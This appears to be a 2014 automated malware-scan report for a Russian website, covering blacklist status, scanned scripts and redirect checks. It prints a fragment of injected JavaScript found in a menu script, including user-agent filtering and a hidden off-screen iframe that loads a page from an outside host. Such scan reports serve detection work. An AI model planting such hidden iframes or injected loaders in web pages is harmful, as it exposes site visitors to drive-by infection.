Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=halkolivan.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://halkolivan.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://halkolivan.ru/ | 200 OK Content-Length: 38536 Content-Type: text/html | clean |
http://halkolivan.ru/media/system/js/caption.js | 200 OK Content-Length: 3885 Content-Type: application/javascript | clean |
http://halkolivan.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 1835 Content-Type: application/javascript | clean |
http://halkolivan.ru/cache/widgetkit/widgetkit-aa0373f8.js | 200 OK Content-Length: 16359 Content-Type: application/javascript | clean |
http://halkolivan.ru/modules/mod_swmenupro/menu_Packed.js | 200 OK Content-Length: 5966 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey ...[5212 bytes skipped]... Decoded script: ...[10872 bytes skipped]... =a_css[n_pos?'inner':'outer'];if(typeof(a_oclass)=='string')return a_oclass;for(var n_currst=n_state;n_currst>=0;n_currst--)if(a_oclass[n_currst])return a_oclass[n_currst]}function mitem_upstatus(b_clear){window.setTimeout("window.status=unescape('"+(b_clear?'':(this.a_config[2]&&this.a_config[2]['sb']?escape(this.a_config[2]['sb']):escape(this.a_config[0])+(this.a_config[1]?' ('+escape(this.a_config[1])+')':'')))+"')",10)} <iframe src="http://Internet.unopaa.net/fghutfotkyrsjsrtjr12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> | ||
http://halkolivan.ru/templates/hot_model_agency/js/jquery.min.js | 200 OK Content-Length: 1835 Content-Type: application/javascript | clean |
http://halkolivan.ru/templates/hot_model_agency/js/HoverSlideEffect/Cantarell.font.js | 200 OK Content-Length: 53868 Content-Type: application/javascript | clean |
http://halkolivan.ru/templates/hot_model_agency/js/HoverSlideEffect/cufon-yui.js | 200 OK Content-Length: 20175 Content-Type: application/javascript | clean |
http://halkolivan.ru/templates/hot_model_agency/js/HoverSlideEffect/jquery.easing.1.3.js | 200 OK Content-Length: 10015 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js | 200 OK Content-Length: 77746 Content-Type: text/javascript | clean |
http://halkolivan.ru/js/jquery.easing.1.3.js | 404 Not Found Content-Length: 298 Content-Type: text/html | clean |
http://halkolivan.ru/test404page.js | 404 Not Found Content-Length: 289 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: halkolivan.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 16 May 2014 01:19:22 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Unix) PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Mon, 01 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 16 May 2014 01:19:22 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: dc3c56aa93f93a2cbb85344273143ce1=a572c09b0538cfd6b6782768085c8f39; path=/
X-Powered-By: PHP/5.2.13
GET / HTTP/1.1
Host: halkolivan.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 16 May 2014 01:19:22 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Unix) PHP/5.2.13
Content-Type: text/html; charset=utf-8
Expires: Mon, 01 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 16 May 2014 01:19:22 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: dc3c56aa93f93a2cbb85344273143ce1=a572c09b0538cfd6b6782768085c8f39; path=/
X-Powered-By: PHP/5.2.13
Second query (visit from search engine):
GET / HTTP/1.1
Host: halkolivan.ru
Referer: http://www.google.com/search?q=halkolivan.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: halkolivan.ru
Referer: http://www.google.com/search?q=halkolivan.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.